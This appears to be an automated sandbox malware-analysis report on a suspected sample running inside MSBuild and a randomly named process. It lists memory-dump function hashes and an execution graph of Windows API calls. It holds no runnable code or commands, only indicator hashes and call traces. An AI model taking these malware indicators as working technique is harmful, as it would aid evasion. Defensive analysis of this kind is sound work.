                                                • Instruction Fuzzy Hash: FF2183353102414BEB155639D858B7EB697EFC8A58F5840B9E502CB794EF25CC82E385
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cab26acd12f76780210a08f7f0169c85ba15ab6dd5b8d1fa9d4084cc09cb6e3
                                                • Instruction ID: e6b0b40a79a60e3428cb279c2ba918af445c3d78cdeb51ea45ab3c6c91feb227
                                                • Opcode Fuzzy Hash: 7cab26acd12f76780210a08f7f0169c85ba15ab6dd5b8d1fa9d4084cc09cb6e3
                                                • Instruction Fuzzy Hash: C531F93178910ACFE389FA18E494A7637B0FB612857D2C855F106CB258C732EC12CF90
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f8a1484ed97bdba72c408e5cf427ff512d77a7d28c72781d07f1a21d6c75443
                                                • Instruction ID: 2976dad99d8d83ee558b5db5b13c4efe5becd84b179bbaa6951ea32a3426ddc2
                                                • Opcode Fuzzy Hash: 0f8a1484ed97bdba72c408e5cf427ff512d77a7d28c72781d07f1a21d6c75443
                                                • Instruction Fuzzy Hash: F621D4357526118FC7299B28D4A862B77A2FFC575178541B9E806DB390DF30DC06C7C4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38d52533b4684ec433615f8d45a88579493b5c1e1357d804b8c97be9132787c4
                                                • Instruction ID: bce33092f63685637d5538ebdfa95abfecfcaa4e28aa2e71161389897dec1b51
                                                • Opcode Fuzzy Hash: 38d52533b4684ec433615f8d45a88579493b5c1e1357d804b8c97be9132787c4
                                                • Instruction Fuzzy Hash: 9021F471A00119AFCF10DF24C844AAE77A9EB8D260F51C599EC0A8B344DB35EE41CBD1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700462770.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2acd000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 87523517a1e298a17f35ad2d41634fe8e4fadfdc2c8f356c01d2028befb5e52b
                                                • Instruction ID: 10af8bd5d6be60f0b673874a10238250d7961233b07eaf0994f54413d86380b8
                                                • Opcode Fuzzy Hash: 87523517a1e298a17f35ad2d41634fe8e4fadfdc2c8f356c01d2028befb5e52b
                                                • Instruction Fuzzy Hash: 5021F271504604EFDB14DF28D9C4B26BB65FB88324F30C97DE94A4B252CB7AD846CA62
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f9f054564354803296941fcc99f41793f53247c8c986e3cfaa09cd4e1b28728
                                                • Instruction ID: 733caf14cd6c0497a5d417f07ea31353c4ce75dcfc466ffd22623c12b168f615
                                                • Opcode Fuzzy Hash: 4f9f054564354803296941fcc99f41793f53247c8c986e3cfaa09cd4e1b28728
                                                • Instruction Fuzzy Hash: FF116D30D8634ACFD7447B7090ACABE7BA9EB4B312F502C94B20663190CF345D11CA5A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6611d4d6247a864a7e8bded8a45d4bab2ab3a203322f84f25c4537ec33bbc4cb
                                                • Instruction ID: 113a52f489a9da8f85b876d4f201318e6ab6d7f0fe497324fdabc24b3b6c34f0
                                                • Opcode Fuzzy Hash: 6611d4d6247a864a7e8bded8a45d4bab2ab3a203322f84f25c4537ec33bbc4cb
                                                • Instruction Fuzzy Hash: B711D6317082545FDB467FB9581816E3F67AFC5250B144426E506C7391DE358D06C7A6
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69c9015c66b38e8681fc5c43c54d3b6e9f4bd40f06ad09b11deee20bf157ce0c
                                                • Instruction ID: 4aad0c6bae0224124f273b18a5d199b94cc6d721d5800a5e20eadd5ef76de09d
                                                • Opcode Fuzzy Hash: 69c9015c66b38e8681fc5c43c54d3b6e9f4bd40f06ad09b11deee20bf157ce0c
                                                • Instruction Fuzzy Hash: EE117131E4425E9FCB01DBF8AC009DEF734FF89210F258756D666B7150EA311956C751
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb0829144078366c6c454a9243eccbdec9dac7220c34ae501efebbff2fa6b1b7
                                                • Instruction ID: cea58a5c805fcee7465e7ccb9ddad5d7ff0455beceb44fb32ff95c02b16484d0
                                                • Opcode Fuzzy Hash: eb0829144078366c6c454a9243eccbdec9dac7220c34ae501efebbff2fa6b1b7
                                                • Instruction Fuzzy Hash: AC11E9357493448FD7152A7A98681BBBFABAFD7211B148477E145C32C6CD248C05C371
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 639eb8bba9b8fe5bbf006ec0efa79e8fa9c04aa57eed0947907a60ca7d756550
                                                • Instruction ID: 3d532445e687ab150bf2d2184f3b4ee25c97a198ff1161be42d1e3af8b573fbd
                                                • Opcode Fuzzy Hash: 639eb8bba9b8fe5bbf006ec0efa79e8fa9c04aa57eed0947907a60ca7d756550
                                                • Instruction Fuzzy Hash: 99216D70D0024ADFEB41EFB8D45479EBBF2FB85304F1196AAC0549B355EB309A468B81
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eaee81fa4faa087c8ffa5a6852b952fce2d7871a32b26179e5c82991248dd90a
                                                • Instruction ID: 608864b266738d9ccea0a381a2a244b6e6255beaadf20c6ce7393c152ea82101
                                                • Opcode Fuzzy Hash: eaee81fa4faa087c8ffa5a6852b952fce2d7871a32b26179e5c82991248dd90a
                                                • Instruction Fuzzy Hash: F011C8313516128FC7295B29D4A852FBBA6FFC465179941B8E806CB390DF30DC02C7D4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fcf209fc5d5e4aab8909eb21dc62a38c8434b540a19b40f6f6d4911d2473cc17
                                                • Instruction ID: b9b10b48960d5dab94ad0f4643ca5b486778918d596f4ad3a2db9f7db632dd70
                                                • Opcode Fuzzy Hash: fcf209fc5d5e4aab8909eb21dc62a38c8434b540a19b40f6f6d4911d2473cc17
                                                • Instruction Fuzzy Hash: 7D11AC30D86289CFCB55ABB0A0A97A9BFB5DF4A311F10A895E545A2181CF301D06CA05
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2b519f01f46322b3e575c35cf8e0e5318752035d1a278497a13885f39610d18
                                                • Instruction ID: e2e8d97e85218af834011f38b5f159da20c4d021f0e1be0c73c2a055c755a8c2
                                                • Opcode Fuzzy Hash: a2b519f01f46322b3e575c35cf8e0e5318752035d1a278497a13885f39610d18
                                                • Instruction Fuzzy Hash: 38113476800249DFDB10DF99D845BEEBFF5EB88320F148419E658A7220C339A954DFA5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 531743b2a96afee70763a0cfbff71b5cad8befc677a322ff325c6328baa6d933
                                                • Instruction ID: 0ccabfcb092424b5378697e9b2e97a6ac885ffc2b1762570948af2919a2f7c87
                                                • Opcode Fuzzy Hash: 531743b2a96afee70763a0cfbff71b5cad8befc677a322ff325c6328baa6d933
                                                • Instruction Fuzzy Hash: 41116772800209DFDB10DF9AC844BEEBFF4EB88320F148419E658A7210C339A950DFA5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 687b273d734c3355985ec4d87ba88857b24ef840d6e1e0e0ba43371481739e4a
                                                • Instruction ID: 621b6d7eb7d777f8368a71542a3d4432789f0f941fd83306ad2469e415d30186
                                                • Opcode Fuzzy Hash: 687b273d734c3355985ec4d87ba88857b24ef840d6e1e0e0ba43371481739e4a
                                                • Instruction Fuzzy Hash: A9114C70D0020ADFEB44EFB8D54579EBBF2FB84304F1095AAC0489B359EB709E468B81
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0ed995f66cd0ccbf65daf79300d756bd8bcf950ec0f69540b4f9bc2ca911491
                                                • Instruction ID: 7195911335cff94cef4a4627cf671ff34b7b703d9a6e1a4b28b82f30e7250d8b
                                                • Opcode Fuzzy Hash: d0ed995f66cd0ccbf65daf79300d756bd8bcf950ec0f69540b4f9bc2ca911491
                                                • Instruction Fuzzy Hash: 5321D3B5C102098FCB44EFA8D99A5EEBFF0FF19300F10556AE845B2254EB305A46CBA5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8be77fec25f6894b490ba322928d6b9f3220eb62e652640e1505ba478f305025
                                                • Instruction ID: 9c43b420ce6c62ddc52f3388a1a51f3baa7d4ac2bedbf1990d526849942175ba
                                                • Opcode Fuzzy Hash: 8be77fec25f6894b490ba322928d6b9f3220eb62e652640e1505ba478f305025
                                                • Instruction Fuzzy Hash: FB11E874F406498FEB10EBE8D950BAEBBB2AB59315F409061D948E7349E6309D42CB51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94f1f919575a6f8ab6a89248c2f4a90420097ed10022f5634ab3641aeee84c66
                                                • Instruction ID: 17b2144ca1f7986bcbec19f80481bfac44af90e1924882b39413b973ece194e9
                                                • Opcode Fuzzy Hash: 94f1f919575a6f8ab6a89248c2f4a90420097ed10022f5634ab3641aeee84c66
                                                • Instruction Fuzzy Hash: 712133B5C1021A8FCB10EFA8E4994EEBFF0FF59304F1441AAD805B7254EB305A46CBA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700462770.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2acd000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                • Instruction ID: 755565e32251b9daee8104500d338ef9751317c3a23ed3ef788897b1bf9260c5
                                                • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                • Instruction Fuzzy Hash: 8D11BB75504684CFCB11CF14D9C4B16BBA2FB88328F34C6AED84A4B652C73AD44ACF62
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7800fd00dd1aa36c968b600125c43a946f28e6ea52f6fa206dff44fb4dc4af8
                                                • Instruction ID: 88d9b3d526864543771f0d9e99cb6237b566b41e457596e8db65ddbcdd173be4
                                                • Opcode Fuzzy Hash: a7800fd00dd1aa36c968b600125c43a946f28e6ea52f6fa206dff44fb4dc4af8
                                                • Instruction Fuzzy Hash: 5A118275F602118FC790EBB8E50866A7BF4EF8876271241A9E425DB351DB36CE05CBD0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72af85cf74149ee405e5a1cac6e1fd5e64c86a6f13a105f1039ea12921cceed4
                                                • Instruction ID: f58dfd95b6f5de600a2f807c2c5c7a63eb84ac7ed29f966f98ec39a4b6289b12
                                                • Opcode Fuzzy Hash: 72af85cf74149ee405e5a1cac6e1fd5e64c86a6f13a105f1039ea12921cceed4
                                                • Instruction Fuzzy Hash: 300192726001156FDB119E58A8006AF3BE7DFD9751F588026F915D7280CB75C8129BE4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ce2f515f30940f831bfa9f09d457bb8ef6861029e1e4227f55aff088cf25d636
                                                • Instruction ID: 59dda81ae57a1cabed554fe63279d08e36e7d22aa20db2907aa19b2644779ad7
                                                • Opcode Fuzzy Hash: ce2f515f30940f831bfa9f09d457bb8ef6861029e1e4227f55aff088cf25d636
                                                • Instruction Fuzzy Hash: 50012631B482814FC705EB39E8445363FAAAF8126136644FBE806CB263EA20CC01C761
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53f3d4b5b2756946efbfa844fece5e394191a978e6c538c06d24015c53cee0e9
                                                • Instruction ID: aab58d49583ad9b96e39bbd43cc768f4f78a7925ba60a6bf4d5377034b24b7ab
                                                • Opcode Fuzzy Hash: 53f3d4b5b2756946efbfa844fece5e394191a978e6c538c06d24015c53cee0e9
                                                • Instruction Fuzzy Hash: A701E470E002199FCF44EFB988046AEBBB5AF88201F50856AD529E7250EB389A01CBD5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75321ede33964118d4ba28c8934ee4457d8065b6a1b04dbbf6383ef67c4834d6
                                                • Instruction ID: 97386e6fce7cb558c75ca82bed5cf737edc85a42263972932168512659edd69c
                                                • Opcode Fuzzy Hash: 75321ede33964118d4ba28c8934ee4457d8065b6a1b04dbbf6383ef67c4834d6
                                                • Instruction Fuzzy Hash: 94F082313502048FD708AF3AE858A3A77AAEFC46507668069F506CB3A0DE30DC01CBA0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25b242d2318f46d856d9c56a0a774022efaddad55cdd4345f91b042615de742e
                                                • Instruction ID: 6a6877b44d4443a5a30fe6eed48910b24fb8ac2d59ed325282a2d20d6c8d87eb
                                                • Opcode Fuzzy Hash: 25b242d2318f46d856d9c56a0a774022efaddad55cdd4345f91b042615de742e
                                                • Instruction Fuzzy Hash: 11E02633D203AA56CB009BB4AC055EFBB38EFA2210F444511D26032000EFB0220AC3E0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 920a06ff97e6bc80e28536bbc3829f8a127a9f9f2f7a44aa1c8d072c13bd2884
                                                • Instruction ID: 147ee78828227962921ec1eba055844c63657c25adc41008e53666b5b6430e1e
                                                • Opcode Fuzzy Hash: 920a06ff97e6bc80e28536bbc3829f8a127a9f9f2f7a44aa1c8d072c13bd2884
                                                • Instruction Fuzzy Hash: C1D01732E2126B968B00AAA5EC048EEB738EE96661B948626D52437140EB70665986A1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                • Instruction ID: 283197759c01ff3fc626353f85bcec3c821462c6153ac3956c3ccd51a249e998
                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                • Instruction Fuzzy Hash: 57C0123320C5282AA629108E7C40AA3AB8CE3C22B4A6901B7F95CA3200A8429C8041E8
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e32aede1268d7a899dee3dd07c4416ef91e2a53c18698dd24c5cec879812bb74
                                                • Instruction ID: a5cb526665745d2b33626318529ff9692780eb2f70a368e6213682527d56eb8b
                                                • Opcode Fuzzy Hash: e32aede1268d7a899dee3dd07c4416ef91e2a53c18698dd24c5cec879812bb74
                                                • Instruction Fuzzy Hash: 4FD0677AB11108DFCB049F99E8449DEB7B6FF9C221B048116F925A3261CA319921DBA4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e74813df1c5ce9ca02088e5fc90395ba9aa7ad1d7150b9f3dc3c5d017ef28d41
                                                • Instruction ID: 7c79b01ac5a8fdbfce8d39f6d82f6c7eac6f2b5d8f610b23f84a93977dac86ea
                                                • Opcode Fuzzy Hash: e74813df1c5ce9ca02088e5fc90395ba9aa7ad1d7150b9f3dc3c5d017ef28d41
                                                • Instruction Fuzzy Hash: 51D02E71928383CBD302F360EE500213B32BA90605BC845ABE800CE60AE6B898898B50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00c2b749b805688e60285f2f531170347f267791727c52c9faf1d5f901a7641d
                                                • Instruction ID: 5768cb34f1825eeee7dc9794d3caba500e1e8a1841429c9b61b0f4f55e28d378
                                                • Opcode Fuzzy Hash: 00c2b749b805688e60285f2f531170347f267791727c52c9faf1d5f901a7641d
                                                • Instruction Fuzzy Hash: 5CC0123013170BCBD601F775FA49655772ABAD0604F404515B1094D219DE74AC854694

                                                Execution Graph

                                                Execution Coverage:8.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:144
                                                Total number of Limit Nodes:7
                                                execution_graph 29173 2bc4668 29174 2bc467a 29173->29174 29175 2bc4686 29174->29175 29179 2bc4778 29174->29179 29184 2bc3e28 29175->29184 29177 2bc46a5 29180 2bc479d 29179->29180 29188 2bc4888 29180->29188 29192 2bc4878 29180->29192 29185 2bc3e33 29184->29185 29200 2bc5c44 29185->29200 29187 2bc6ff6 29187->29177 29189 2bc48af 29188->29189 29191 2bc498c 29189->29191 29196 2bc44b0 29189->29196 29194 2bc4888 29192->29194 29193 2bc498c 29194->29193 29195 2bc44b0 CreateActCtxA 29194->29195 29195->29193 29197 2bc5918 CreateActCtxA 29196->29197 29199 2bc59db 29197->29199 29199->29191 29201 2bc5c4f 29200->29201 29204 2bc5c64 29201->29204 29203 2bc7165 29203->29187 29205 2bc5c6f 29204->29205 29208 2bc5c94 29205->29208 29207 2bc7242 29207->29203 29209 2bc5c9f 29208->29209 29212 2bc5cc4 29209->29212 29211 2bc7345 29211->29207 29214 2bc5ccf 29212->29214 29213 2bc82e5 29214->29213 29216 2bc864b 29214->29216 29220 2bcacf9 29214->29220 29215 2bc8689 29215->29211 29216->29215 29224 2bccde8 29216->29224 29229 2bccdf8 29216->29229 29234 2bcad30 29220->29234 29237 2bcad20 29220->29237 29221 2bcad0e 29221->29216 29225 2bcce19 29224->29225 29226 2bcce3d 29225->29226 29246 2bccfa8 29225->29246 29250 2bccf97 29225->29250 29226->29215 29230 2bcce19 29229->29230 29231 2bcce3d 29230->29231 29232 2bccfa8 GetModuleHandleW 29230->29232 29233 2bccf97 GetModuleHandleW 29230->29233 29231->29215 29232->29231 29233->29231 29241 2bcae28 29234->29241 29235 2bcad3f 29235->29221 29238 2bcad30 29237->29238 29240 2bcae28 GetModuleHandleW 29238->29240 29239 2bcad3f 29239->29221 29240->29239 29242 2bcae5c 29241->29242 29243 2bcae39 29241->29243 29242->29235 29243->29242 29244 2bcb060 GetModuleHandleW 29243->29244 29245 2bcb08d 29244->29245 29245->29235 29247 2bccfb5 29246->29247 29248 2bccfef 29247->29248 29254 2bcbb60 29247->29254 29248->29226 29251 2bccfa8 29250->29251 29252 2bccfef 29251->29252 29253 2bcbb60 GetModuleHandleW 29251->29253 29252->29226 29253->29252 29255 2bcbb6b 29254->29255 29257 2bcdd08 29255->29257 29258 2bcd35c 29255->29258 29257->29257 29259 2bcd367 29258->29259 29260 2bc5cc4 GetModuleHandleW 29259->29260 29261 2bcdd77 29260->29261 29261->29257 29092 53897b0 29093 53897b1 29092->29093 29094 538987b 29093->29094 29098 5389ca8 29093->29098 29102 5389c98 29093->29102 29095 5389871 29099 5389ca9 29098->29099 29100 538a12d 29099->29100 29106 538a660 29099->29106 29100->29095 29103 5389c9c 29102->29103 29104 538a12d 29103->29104 29105 538a660 CreateIconFromResourceEx 29103->29105 29104->29095 29105->29104 29107 538a664 29106->29107 29108 538a697 29107->29108 29109 538a6c0 CreateIconFromResourceEx 29107->29109 29108->29100 29110 538a73e 29109->29110 29110->29100 29111 2b7d01c 29112 2b7d034 29111->29112 29113 2b7d08e 29112->29113 29116 5382818 29112->29116 29121 5382809 29112->29121 29117 5382845 29116->29117 29118 5382877 29117->29118 29126 5382990 29117->29126 29131 53829a0 29117->29131 29122 5382818 29121->29122 29123 5382877 29122->29123 29124 53829a0 2 API calls 29122->29124 29125 5382990 2 API calls 29122->29125 29124->29123 29125->29123 29127 53829a0 29126->29127 29136 5382a58 29127->29136 29140 5382a49 29127->29140 29128 5382a40 29128->29118 29133 53829b4 29131->29133 29132 5382a40 29132->29118 29134 5382a58 2 API calls 29133->29134 29135 5382a49 2 API calls 29133->29135 29134->29132 29135->29132 29137 5382a69 29136->29137 29145 5383fe8 29136->29145 29150 5383f54 29136->29150 29137->29128 29141 5382a58 29140->29141 29142 5382a69 29141->29142 29143 5383fe8 2 API calls 29141->29143 29144 5383f54 2 API calls 29141->29144 29142->29128 29143->29142 29144->29142 29146 5383ff4 29145->29146 29146->29137 29155 5384030 29146->29155 29159 5384040 29146->29159 29147 538402a 29147->29137 29151 5383f86 29150->29151 29151->29137 29153 5384030 CallWindowProcW 29151->29153 29154 5384040 CallWindowProcW 29151->29154 29152 538402a 29152->29137 29153->29152 29154->29152 29156 5384040 29155->29156 29157 53840da CallWindowProcW 29156->29157 29158 5384089 29156->29158 29157->29158 29158->29147 29160 5384082 29159->29160 29162 5384089 29159->29162 29161 53840da CallWindowProcW 29160->29161 29160->29162 29161->29162 29162->29147 29163 82c0040 29164 82c01cb 29163->29164 29165 82c0066 29163->29165 29165->29164 29168 82c06c8 PostMessageW 29165->29168 29170 82c06c0 29165->29170 29169 82c0734 29168->29169 29169->29165 29171 82c06c8 PostMessageW 29170->29171 29172 82c0734 29171->29172 29172->29165 29262 2bcd0c0 29263 2bcd106 29262->29263 29267 2bcd6a8 29263->29267 29270 2bcd699 29263->29270 29264 2bcd1f3 29273 2bcd2fc 29267->29273 29271 2bcd6d6 29270->29271 29272 2bcd2fc DuplicateHandle 29270->29272 29271->29264 29272->29271 29274 2bcd710 DuplicateHandle 29273->29274 29275 2bcd6d6 29274->29275 29275->29264

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02BCB07E
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: c686fe2b9dab92bc6752fd928db4e8ceeabf6bb65f41f4a1c848b6a27de3d5da
                                                • Instruction ID: 4de111d78e277a442548b7e42f88d74bf009b287ac78c6ce151875ceb3466149
                                                • Opcode Fuzzy Hash: c686fe2b9dab92bc6752fd928db4e8ceeabf6bb65f41f4a1c848b6a27de3d5da
                                                • Instruction Fuzzy Hash: 267134B0A00B098FD724DF29D45475ABBF1FF88304F208A6ED49ADBA40DB75E845CB90

                                                Control-flow Graph

                                                • Executed
